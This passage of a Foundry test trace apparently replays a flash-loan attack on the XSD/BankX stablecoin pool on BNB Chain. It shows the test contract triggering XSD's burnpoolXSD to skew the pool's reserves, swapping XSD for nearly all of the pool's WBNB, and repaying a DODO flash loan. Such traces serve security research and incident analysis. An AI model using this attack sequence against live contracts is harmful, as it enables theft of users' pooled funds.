    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147419228878 [3.689e19], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 36893488147419228878 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000088577cf8
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000015d08ee
    │   │   │   │   │   │   │   │   │   ├─ [5620] XSD::eth_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000c9e6bfe
    │   │   │   │   │   │   │   │   │   ├─ [5656] XSD::xag_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [4162] 0x25E084A3B5dAb1F8272BBcC9E2935430069DB8Ff::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x817326922c909b16944817c207562B25C4dF16aD::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x168f55dFe619E37fe2393c3bA3c831647F8617c0::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 125646 [1.256e5], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 125646 [1.256e5]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147419228878 [3.689e19], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 36893488147419228878 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000088577cf8
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000015d08ee
    │   │   │   │   │   │   │   │   │   ├─ [369] XSDWETHpool::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3963937398991055853792 [3.963e21], 3857071215838228063464 [3.857e21], 1695753429 [1.695e9]
    │   │   │   │   │   │   │   │   │   ├─ [7181] XSD::xsd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   │   ├─ [369] XSDWETHpool::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3963937398991055853792 [3.963e21], 3857071215838228063464 [3.857e21], 1695753429 [1.695e9]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000c9e6bfe
    │   │   │   │   │   │   │   │   │   ├─ [7181] XSD::xsd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   │   ├─ [369] XSDWETHpool::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3963937398991055853792 [3.963e21], 3857071215838228063464 [3.857e21], 1695753429 [1.695e9]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000c9e6bfe
    │   │   │   │   │   │   │   │   │   ├─ [5620] XSD::eth_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000c9e6bfe
    │   │   │   │   │   │   │   │   │   ├─ [7181] XSD::xsd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   │   ├─ [369] XSDWETHpool::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3963937398991055853792 [3.963e21], 3857071215838228063464 [3.857e21], 1695753429 [1.695e9]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000c9e6bfe
    │   │   │   │   │   │   │   │   │   ├─ [5656] XSD::xag_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [4162] 0x25E084A3B5dAb1F8272BBcC9E2935430069DB8Ff::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x817326922c909b16944817c207562B25C4dF16aD::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x168f55dFe619E37fe2393c3bA3c831647F8617c0::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 125646 [1.256e5], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 125646 [1.256e5]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147419228878 [3.689e19], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 36893488147419228878 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000088577cf8
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000015d08ee
    │   │   │   │   │   │   │   │   │   ├─ [405] XSD::totalSupply() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 20000547033338243084561810 [2e25]
    │   │   │   │   │   │   │   │   │   ├─ [369] XSDWETHpool::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3963937398991055853792 [3.963e21], 3857071215838228063464 [3.857e21], 1695753429 [1.695e9]
    │   │   │   │   │   │   │   │   │   ├─ [5620] XSD::eth_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000c9e6bfe
    │   │   │   │   │   │   │   │   │   ├─ [3200] 0xED024d771261D765B9Dc7b0947ef271ea006248F::allocatedSupply() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [2384] 0xE97E0f2a6f70176c757c82b5c392f93C34D99fA8::allocatedSupply() [delegatecall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [395] 0x2946Ca638EB11830E83Feaa130aA8B13d37C3772::bankx_minted_count() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   │   │   │   │   │   ├─ [327] 0x4d369BD339709021267E92702A9E4cE30be85706::totalSupply() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 472721303262100063425570406 [4.727e26]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000001941a47e04bc64e
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000001941a47e04bc64e
    │   │   │   │   │   │   │   │   │   ├─ [7233] XSD::bankx_price() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   │   ├─ [369] 0x224E13D9eAB11eDc09411ef4bF800791a7EF6135::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 1347232252051346746666523 [1.347e24], 2600871202054432854 [2.6e18], 1695753429 [1.695e9]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000198
    │   │   │   │   │   │   │   │   │   ├─ [369] 0x224E13D9eAB11eDc09411ef4bF800791a7EF6135::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 1347232252051346746666523 [1.347e24], 2600871202054432854 [2.6e18], 1695753429 [1.695e9]
    │   │   │   │   │   │   │   │   │   ├─ [5620] XSD::eth_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000c9e6bfe
    │   │   │   │   │   │   │   │   │   ├─ [5656] XSD::xag_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [4162] 0x25E084A3B5dAb1F8272BBcC9E2935430069DB8Ff::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x817326922c909b16944817c207562B25C4dF16aD::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x168f55dFe619E37fe2393c3bA3c831647F8617c0::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 125646 [1.256e5], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 125646 [1.256e5]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147419228878 [3.689e19], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 36893488147419228878 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000088577cf8
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000015d08ee
    │   │   │   │   │   │   │   │   │   ├─ [352] 0x2946Ca638EB11830E83Feaa130aA8B13d37C3772::collat_XSD()
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000015b42616817e3414b
    │   │   │   │   │   │   │   │   │   ├─ [7606] 0x2946Ca638EB11830E83Feaa130aA8B13d37C3772::collatDollarBalance() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [5620] XSD::eth_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000c9e6bfe
    │   │   │   │   │   │   │   │   │   │   ├─ [534] WBNB::balanceOf(0x2946Ca638EB11830E83Feaa130aA8B13d37C3772) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 77114640440362412 [7.711e16]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 16325857706505293295 [1.632e19]
    │   │   │   │   │   │   │   │   │   ├─ [407] XSD::global_collateral_ratio() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000f4240
    │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x56e26e797598d5291f1150050b5a6538924128b4f9f5326bd3ff0fa4ddb623a8: 0 → 0x000000000000000000000000000000000000000000000000000000e8d4a51000
    │   │   │   │   │   │   │   │   │   @ 0xac39e8d1c3f5b1760e81cfeda260fe2c94a43b86d84fa720a00ff60919b9a748: 0x000000000000000000000000000000000000000000000000241825ab345a5856 → 0x0000000000000000000000000000000000000000000000002418269408ff6856
    │   │   │   │   │   │   │   │   │   @ 61: 0x00000000000000000000000000000000000000000000000000000000651321db → 0x00000000000000000000000000000000000000000000000000000000651324d5
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x86e7fb876aae3f33df41af6d98f92d856f261421355a70f48607a80e4e8fc2e0: 0x0000000000000000000000000000000000000000000000031805b06db93b24e8 → 0x0000000000000000000000000000000000000000000000d1179dab2a6d9b24e8
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [2374] 0xD6cd86a72B03a4C4996923E74FC22EEe7713F908::collat_XSD() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000002444a1321f9dbd6c15051
    │   │   │   │   │   │   ├─ [405] XSD::totalSupply() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 20000547033338243084561810 [2e25]
    │   │   │   │   │   │   ├─ [610] PIDController::bucket1() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ [26525] XSD::burnpoolXSD(3956623826572226095543 [3.956e21])
    │   │   │   │   │   │   │   ├─ [352] 0x2946Ca638EB11830E83Feaa130aA8B13d37C3772::collat_XSD() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000015b42616817e3414b
    │   │   │   │   │   │   │   ├─ emit Transfer(from: XSDWETHpool: [0xbfBcB8BDE20cc6886877DD551b337833F3e0d96d], to: 0x0000000000000000000000000000000000000000, value: 3956623826572226095543 [3.956e21])
    │   │   │   │   │   │   │   ├─ [13144] XSDWETHpool::sync()
    │   │   │   │   │   │   │   │   ├─ [585] XSD::balanceOf(XSDWETHpool: [0xbfBcB8BDE20cc6886877DD551b337833F3e0d96d]) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 7313572418829758249 [7.313e18]
    │   │   │   │   │   │   │   │   ├─ [534] WBNB::balanceOf(XSDWETHpool: [0xbfBcB8BDE20cc6886877DD551b337833F3e0d96d]) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 3857071215838228063464 [3.857e21]
    │   │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 7313572418829758249 [7.313e18], reserve1: 3857071215838228063464 [3.857e21])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 60: 0x651324d50000000000d1179dab2a6d9b24e80000000000d6e2ae9e8abbbd98e0 → 0x651324d50000000000d1179dab2a6d9b24e8000000000000657f075daf712f29
    │   │   │   │   │   │   │   │   │   @ 63: 0x0000000000000000000000000000aec7db21da333faf7a1e2433d0fbdd469618 → 0x00000000000000000000000000000052e611efe9d6d6a65d2fcb63e8ec078128
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ emit XSDBurned(param0: Router: [0xfADDa925e10d07430f5d7461689fd90d3D81bB48], param1: XSD: [0x39400E67820c88A9D67F4F9c1fbf86f3D688e9F6], param2: 3956623826572226095543 [3.956e21])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xbd438142a761e95b3fb372672bcff2e202c3924835bec4a7705d3d1d66e3e062: 0x0000000000000000000000000000000000000000000000d6e2ae9e8abbbd98e0 → 0x000000000000000000000000000000000000000000000000657f075daf712f29
    │   │   │   │   │   │   │   │   @ 2: 0x000000000000000000000000000000000000000000108b47d3c4d563d729ad92 → 0x000000000000000000000000000000000000000000108a7156953e36cadd43db
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 51: 2 → 1
    │   │   │   │   │   │   │   @ 0xbd438142a761e95b3fb372672bcff2e202c3924835bec4a7705d3d1d66e3e062: 0x000000000000000000000000000000000000000000003059d152831b22dbe501 → 0x0000000000000000000000000000000000000000000038bab52e6add9dd8062f
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [3235] XSD::transfer(XSDWETHpool: [0xbfBcB8BDE20cc6886877DD551b337833F3e0d96d], 263932735529288914857295 [2.639e23])
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: XSDWETHpool: [0xbfBcB8BDE20cc6886877DD551b337833F3e0d96d], value: 263932735529288914857295 [2.639e23])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xbd438142a761e95b3fb372672bcff2e202c3924835bec4a7705d3d1d66e3e062: 0x000000000000000000000000000000000000000000000000657f075daf712f29 → 0x0000000000000000000000000000000000000000000037e437fed3b0918b9c78
    │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000037e3d27fcc52e21a6d4f → 0
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [16564] XSDWETHpool::swap(0, 3856964339410199718035 [3.856e21], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─ [3262] WBNB::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3856964339410199718035 [3.856e21])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: XSDWETHpool: [0xbfBcB8BDE20cc6886877DD551b337833F3e0d96d], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3856964339410199718035 [3.856e21])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x86e7fb876aae3f33df41af6d98f92d856f261421355a70f48607a80e4e8fc2e0: 0x0000000000000000000000000000000000000000000000d1179dab2a6d9b24e8 → 0x000000000000000000000000000000000000000000000000017bb38b877dfc55
    │   │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000000ad78ebc5ac6200000 → 0x0000000000000000000000000000000000000000000000dbedb0b3f9ac3d2893
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [585] XSD::balanceOf(XSDWETHpool: [0xbfBcB8BDE20cc6886877DD551b337833F3e0d96d]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 263940049101707744615544 [2.639e23]
    │   │   │   │   │   │   ├─ [534] WBNB::balanceOf(XSDWETHpool: [0xbfBcB8BDE20cc6886877DD551b337833F3e0d96d]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 106876428028345429 [1.068e17]
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 263940049101707744615544 [2.639e23], reserve1: 106876428028345429 [1.068e17])
    │   │   │   │   │   │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 263932735529288914857295 [2.639e23], amount1In: 0, amount0Out: 0, amount1Out: 3856964339410199718035 [3.856e21], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 60: 0x651324d50000000000d1179dab2a6d9b24e8000000000000657f075daf712f29 → 0x651324d5000000000000017bb38b877dfc550000000037e437fed3b0918b9c78
    │   │   │   │   │   │   │   @ 56: 0x000000000000000000000000000000000000000000000860e3dbe7c27afc212e → 0x0000000000000000000000000000000000000000000037e3d27fcc52e21a6d4f
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [3262] WBNB::transfer(DPPAdvance: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d], 1000000000000000000000 [1e21])
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DPPAdvance: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d], value: 1000000000000000000000 [1e21])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x3c60da1376f85a7f3c888682818856b0c611572c8d06dc51114a9951a6f90e17: 0x00000000000000000000000000000000000000000000000f4802b828af4c834d → 0x0000000000000000000000000000000000000000000000457dcc65ee8dec834d
    │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000dbedb0b3f9ac3d2893 → 0x0000000000000000000000000000000000000000000000a5b7e70633cd9d2893
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xbd438142a761e95b3fb372672bcff2e202c3924835bec4a7705d3d1d66e3e062: 0x000000000000000000000000000000000000000000000000657f075daf712f29 → 0x0000000000000000000000000000000000000000000037e437fed3b0918b9c78
    │   │   │   │   │   │   @ 51: 2 → 1
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [534] WBNB::balanceOf(DPPAdvance: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1281890073311206736717 [1.281e21]
    │   │   │   │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(DPPAdvance: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 135019717032122218788120 [1.35e23]
    │   │   │   │   ├─ [534] WBNB::balanceOf(DPPAdvance: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1281890073311206736717 [1.281e21]
    │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(DPPAdvance: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 135019717032122218788120 [1.35e23]
    │   │   │   │   ├─ emit DODOFlashLoan(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 1000000000000000000000 [1e21], : 0)
